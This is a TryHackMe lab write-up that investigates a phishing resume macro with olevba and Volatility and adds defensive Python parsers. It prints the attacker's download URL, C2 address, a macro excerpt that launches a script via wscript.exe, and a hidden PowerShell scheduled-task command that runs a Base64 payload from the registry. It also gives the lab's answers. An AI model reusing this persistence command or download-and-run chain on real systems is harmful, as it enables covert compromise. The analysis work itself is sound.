TryHackMe Malware Analysis & Incident Response Medium Apr '26

Boogeyman 2

Investigated a second-wave attack by the Boogeyman group, this time targeting HR via a malicious Word document resume. Used Volatility for memory forensics to trace payload execution, C2 establishment, and scheduled task persistence.

Difficulty: Medium · Completion: 100% · Platform: TryHackMe

Tools used: Volatility, olevba, strings, CyberChef
01

Email and Document Analysis

Q1. What email was used to send the phishing email?
email header showing sender, recipient, and attachment

from the header in this screenshot, we can see the sender address used for the phishing email, an outlook.com account:

Answer: westaylor23@outlook.com
Q2. What is the email of the victim employee?

from the same screenshot, the recipient field gives us the victim employee's address:

Answer: maxine.beck@quicklogisticsorg.onmicrosoft.com
Q3. What is the name of the attached malicious document?

the same screenshot also shows the name of the attached document:

Answer: Resume_WesleyTaylor.doc
Q4. What is the MD5 hash of the malicious attachment?

after extracting the attachment, we run md5sum to get its hash:

md5sum output showing 52c4384a0b9e248b95804352ebec6c5b
Answer: 52c4384a0b9e248b95804352ebec6c5b
Q5. What URL is used to download the stage 2 payload based on the document's macro?

using olevba, we were able to see the document's macro without opening it.

olevba output showing macro with download URL to boogeymanisback.lol

by inspecting the macro, we see it tries to download something from https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.png

Answer: https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.png
Q6. What is the name of the process that executed the newly downloaded stage 2 payload?

looking at the same macro, the downloaded file is executed with wscript.exe

Answer: wscript.exe
Q7. What is the full file path of the malicious stage 2 payload?

the drop path of the downloaded file can be seen in the same olevba screenshot

Answer: C:\ProgramData\update.js
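The first section boils down to two things: hashing the attachment and pulling the download URL, drop path and launcher out of the olevba output. Below is an added example (my own code, not part of the lab or the olevba project) that does that over a constructed macro excerpt; the URL, path and wscript.exe reference match the write-up, while the attachment bytes and surrounding VBA are placeholders.

```python
import hashlib
import re

# Constructed stand-in for the attachment bytes; the real document is not reproduced here.
SAMPLE_ATTACHMENT = b"constructed placeholder for Resume_WesleyTaylor.doc"

# Constructed excerpt in the style of olevba output. The URL, drop path and the
# wscript.exe launcher match the write-up; the surrounding VBA is illustrative only.
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim url As String
    url = "https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.png"
    Dim dest As String
    dest = "C:\ProgramData\update.js"
    ' ... download url and write it to dest ...
    Shell "wscript.exe " & dest, vbHide
End Sub
'''

URL_RE = re.compile(r'https?://[^\s"\']+')
# Drive letter, colon, then backslash-separated components without quotes or whitespace.
WIN_PATH_RE = re.compile(r'[A-Za-z]:\\(?:[^\\"\'\s]+\\)*[^\\"\'\s]+')
# Script hosts and LOLBins commonly used by maldocs to run a second stage.
INTERPRETERS = ("wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe",
                "cmd.exe", "rundll32.exe", "regsvr32.exe")


def md5_hex(data: bytes) -> str:
    """Same value md5sum prints for the file."""
    return hashlib.md5(data).hexdigest()


def defang(url: str) -> str:
    """Rewrite a URL so it cannot be clicked when pasted into a report."""
    scheme, rest = url.split("://", 1)
    host, _, path = rest.partition("/")
    return f"{scheme.replace('http', 'hxxp')}[://]{host.replace('.', '[.]')}/{path}"


def extract_iocs(macro_text: str) -> dict:
    """Pull URLs, Windows paths and launcher binaries out of decoded VBA text."""
    lowered = macro_text.lower()
    return {
        "urls": sorted(set(URL_RE.findall(macro_text))),
        "paths": sorted(set(WIN_PATH_RE.findall(macro_text))),
        "interpreters": [i for i in INTERPRETERS if i in lowered],
    }


def analyse(attachment: bytes, macro_text: str) -> dict:
    """Combine the hash of the attachment with the IOCs from its macro."""
    report = {"md5": md5_hex(attachment)}
    report.update(extract_iocs(macro_text))
    report["defanged_urls"] = [defang(u) for u in report["urls"]]
    return report


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_ATTACHMENT, SAMPLE_MACRO).items():
        print(f"{key}: {value}")
```

On a real case you would feed it the bytes of the extracted .doc and the text from `olevba --decode`; the defanged URLs are what goes into the report, the raw ones into blocklists.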
02

Memory Forensics with Volatility

Q8. What is the PID of the process that executed the stage 2 payload?

we have the memory dump artifact, so we can use volatility.

Volatility plugin selection for process listing

we use the pslist plugin and look for wscript.exe in the output.

Volatility pslist output showing wscript.exe PID 4260
Answer: 4260
Q9. What is the parent PID of the process that executed the stage 2 payload?

no grep needed here: the PPID column of the same pslist output gives us the parent.

Volatility output showing PPID 1224 for wscript.exe
Answer: 1224
Q10. What URL is used to download the malicious binary executed by the stage 2 payload?

this is the same URL we already saw in the macro screenshot earlier.

Answer: https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.png
Q11. What is the PID of the malicious process used to establish the C2 connection?

we know the stage 2 file was update.js, so we look at the process tree for children of wscript.exe.

Volatility pstree showing updater.exe PID 6216 spawned from wscript

updater.exe, spawned from wscript.exe, is the process that establishes the C2 connection.

Answer: 6216
Q12. What is the full file path of the malicious process used to establish the C2 connection?
running the cmdline plugin we see this:

Volatility cmdline output showing C:\Windows\Tasks\updater.exe

Answer: C:\Windows\Tasks\updater.exe
Q13. What is the IP address and port of the C2 connection initiated by the malicious binary?

we use the netscan plugin for this and look for the updater.exe PID.

Volatility netscan output showing 128.199.95.189:8080

and we see the connection to 128.199.95.189:8080

Answer: 128.199.95.189:8080
Q14. What is the full file path of the malicious email attachment based on the memory dump?

running the cmdline plugin again shows the full path Word opened the attachment from:

Volatility cmdline showing full INetCache path of Resume_WesleyTaylor (002).doc
Answer: C:\Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\WQHGZCFI\Resume_WesleyTaylor (002).doc
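Questions 8 through 13 are one workflow: find the process by name, walk PPIDs up to rebuild the chain, then join the PID against netscan for the C2 endpoint. The following is an added example of doing that over saved Volatility 3 text output (my own code, not Volatility's and not part of the lab). The pslist and netscan excerpts are constructed in vol3's tab-separated style; PIDs 4260, 1224 and 6216 and the endpoint 128.199.95.189:8080 come from the write-up, while the other rows, the parent's image name (WINWORD.EXE is an assumption), offsets and timestamps are made up.

```python
from dataclasses import dataclass
from typing import Dict, List

# Constructed excerpt in Volatility 3 pslist style (tab separated).
# 4260 (wscript.exe), 1224 (its parent) and 6216 (updater.exe) match the write-up;
# the parent's image name, the other rows, offsets and times are invented for the example.
SAMPLE_PSLIST = """\
Volatility 3 Framework (constructed sample)
PID\tPPID\tImageFileName\tOffset(V)\tThreads\tHandles\tSessionId\tWow64\tCreateTime\tExitTime\tFile output
4\t0\tSystem\t0xaa0\t120\t-\tN/A\tFalse\t2023-08-21 00:00:00.000000\tN/A\tDisabled
600\t4\texplorer.exe\t0xaa1\t40\t-\t1\tFalse\t2023-08-21 00:01:00.000000\tN/A\tDisabled
1224\t600\tWINWORD.EXE\t0xaa2\t30\t-\t1\tFalse\t2023-08-21 00:02:00.000000\tN/A\tDisabled
4260\t1224\twscript.exe\t0xaa3\t5\t-\t1\tFalse\t2023-08-21 00:03:00.000000\tN/A\tDisabled
6216\t4260\tupdater.exe\t0xaa4\t3\t-\t1\tFalse\t2023-08-21 00:04:00.000000\tN/A\tDisabled
"""

# Constructed excerpt in Volatility 3 netscan style; only the first row is from the write-up.
SAMPLE_NETSCAN = """\
Offset\tProto\tLocalAddr\tLocalPort\tForeignAddr\tForeignPort\tState\tPID\tOwner\tCreated
0xbb0\tTCPv4\t10.0.0.5\t49700\t128.199.95.189\t8080\tESTABLISHED\t6216\tupdater.exe\t2023-08-21 00:04:10.000000
0xbb1\tTCPv4\t0.0.0.0\t135\t0.0.0.0\t0\tLISTENING\t900\tsvchost.exe\t2023-08-21 00:00:30.000000
0xbb2\tUDPv4\t0.0.0.0\t123\t*\t0\t\t900\tsvchost.exe\t2023-08-21 00:00:31.000000
"""


@dataclass
class Proc:
    pid: int
    ppid: int
    name: str


def parse_pslist(text: str) -> Dict[int, Proc]:
    """Index pslist rows by PID; banner, header and blank lines are skipped."""
    procs: Dict[int, Proc] = {}
    for line in text.splitlines():
        cols = line.split("\t")
        if len(cols) < 3 or not cols[0].strip().isdigit():
            continue
        pid, ppid = int(cols[0]), int(cols[1])
        procs[pid] = Proc(pid, ppid, cols[2].strip())
    return procs


def find_by_name(procs: Dict[int, Proc], name: str) -> List[Proc]:
    return [p for p in procs.values() if p.name.lower() == name.lower()]


def ancestry(procs: Dict[int, Proc], pid: int) -> List[Proc]:
    """Walk PPIDs from pid to the root; stops on unknown parents or PID reuse loops."""
    chain, seen = [], set()
    cur = procs.get(pid)
    while cur and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur)
        cur = procs.get(cur.ppid)
    return chain


def connections_for_pid(netscan_text: str, pid: int) -> List[str]:
    """Foreign endpoints owned by pid, ignoring listeners and wildcard sockets."""
    out = []
    for line in netscan_text.splitlines():
        cols = line.split("\t")
        if len(cols) < 8 or not cols[7].strip().isdigit():
            continue
        foreign = cols[4].strip()
        if int(cols[7]) == pid and foreign not in ("0.0.0.0", "*", "::"):
            out.append(f"{foreign}:{cols[5].strip()}")
    return out


def trace_c2(pslist_text: str, netscan_text: str, binary_name: str) -> dict:
    """For each process named binary_name: its parent chain and its outbound connections."""
    procs = parse_pslist(pslist_text)
    return {
        p.pid: {
            "chain": " <- ".join(f"{c.name}({c.pid})" for c in ancestry(procs, p.pid)),
            "c2": connections_for_pid(netscan_text, p.pid),
        }
        for p in find_by_name(procs, binary_name)
    }


if __name__ == "__main__":
    for pid, info in trace_c2(SAMPLE_PSLIST, SAMPLE_NETSCAN, "updater.exe").items():
        print(pid, info["chain"], info["c2"])
```

Redirect `vol -f dump.raw windows.pslist` and `windows.netscan` to files and point the functions at them; the chain string is the answer to Q8, Q9 and Q11 in one line, and the `c2` list is Q13.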
03

Scheduled Task Persistence

Q15. The attacker implanted a scheduled task right after establishing the C2 callback. What is the full command used by the attacker to maintain persistent access?

this is a much harder question since it doesn't appear in the cmdline output. so I used AI to my advantage. I used memmap here to dump the schtasks-related memory, but the schtasks command came out incomplete.

Volatility memmap output for schtasks — incomplete result

I tried checking whether I could run this against the raw file itself, and it was possible using strings.

strings output on raw memory dump revealing full schtasks command

and so we got this

Answer: schtasks /Create /F /SC DAILY /ST 09:00 /TN Updater /TR 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))"'
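The recovered command is worth understanding rather than just copying: the task runs PowerShell hidden and non-interactively, reads a value from the registry, Base64-decodes it, treats the bytes as UTF-16 and passes the text to IEX. Below is an added example (my own code, not part of the lab) that triages `strings` output for `schtasks /Create` lines, parses their switches, flags those indicators in the /TR command, and reverses the Base64 -> UTF-16 chain on a registry value the way a responder would when recovering what the task actually runs. The strings lines are constructed; the schtasks command is the one from the write-up, the second task is benign filler, and the registry value is a placeholder holding a harmless string, not the lab's real payload.

```python
import base64
import re
from typing import Dict, List

# Constructed lines in the style of `strings` over a memory image. The first
# schtasks line is the one recovered in the write-up; the rest is filler.
SAMPLE_STRINGS = r"""
Microsoft Windows [Version 10.0.19045]
schtasks /Create /F /SC DAILY /ST 09:00 /TN Updater /TR 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))"'
C:\Windows\Tasks\updater.exe
schtasks /Create /SC ONLOGON /TN "OneDrive Sync" /TR "C:\Program Files\OneDrive\OneDrive.exe /background"
"""

# /NAME followed optionally by a value: 'single quoted', "double quoted" or bare.
# The (?!/) lookahead keeps value-less switches like /F from swallowing the next switch.
SWITCH_RE = re.compile(r"""/(\w+)(?:\s+(?!/)(?:'([^']*)'|"([^"]*)"|(\S+)))?""")

# Substrings in a task's /TR command that together make up the pattern seen in this lab.
SUSPICIOUS = {
    "hidden window": ("-w hidden", "-windowstyle hidden"),
    "non-interactive": ("-noni", "-noninteractive"),
    "in-memory execution": ("iex", "invoke-expression"),
    "base64 decode": ("frombase64string",),
    "registry-stored payload": ("hkcu:", "hklm:", "get-itemproperty", "gp "),
}


def parse_schtasks(line: str) -> Dict[str, str]:
    """Map switch names (upper case) to their values; flags map to ''."""
    opts: Dict[str, str] = {}
    for name, sq, dq, bare in SWITCH_RE.findall(line):
        opts[name.upper()] = sq or dq or bare
    return opts


def indicators(task_run: str) -> List[str]:
    """Labels from SUSPICIOUS whose needles appear in the /TR command."""
    low = task_run.lower()
    return [label for label, needles in SUSPICIOUS.items() if any(n in low for n in needles)]


def triage_strings(text: str) -> List[dict]:
    """One finding per `schtasks /Create` line: task name, schedule and indicators."""
    findings = []
    for line in text.splitlines():
        if not re.search(r"schtasks\s+/create", line, re.I):
            continue
        opts = parse_schtasks(line)
        run = opts.get("TR", "")
        findings.append({
            "name": opts.get("TN"),
            "schedule": opts.get("SC"),
            "start": opts.get("ST"),
            "run": run,
            "indicators": indicators(run),
        })
    return findings


def decode_registry_payload(b64_value: str) -> str:
    """Reverse the task's decode chain: Base64 -> UTF-16LE bytes -> text."""
    return base64.b64decode(b64_value).decode("utf-16-le")


# Constructed stand-in for the 'debug' value under HKCU:\...\CurrentVersion.
# It encodes a harmless placeholder, not the lab's real second stage.
SAMPLE_DEBUG_VALUE = base64.b64encode(
    "Write-Output 'constructed placeholder'".encode("utf-16-le")
).decode("ascii")


if __name__ == "__main__":
    for f in triage_strings(SAMPLE_STRINGS):
        print(f["name"], f["schedule"], f["start"], f["indicators"])
    print(decode_registry_payload(SAMPLE_DEBUG_VALUE))
```

On a live case, `strings -el` (UTF-16) as well as plain `strings` over the dump is worth running before the triage, since Windows command lines often sit in memory as wide strings; and the decoded registry value should be read in a text editor, never executed.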
Key Takeaways
  • olevba lets you read VBA macros without opening the document at all. start there, always
  • cmdline and pstree in Volatility are how you rebuild what ran and in what order. that's your starting point
  • registry + schtasks persistence is hard to catch because the payload lives in a registry value and is decoded in memory. no new binary on disk, no obvious alert
  • when a Volatility plugin comes back incomplete, memmap + strings usually fills in the rest

good lab. really enjoyed this one, especially the volatility sections. something about working through memory just makes the investigation feel more concrete than logs alone.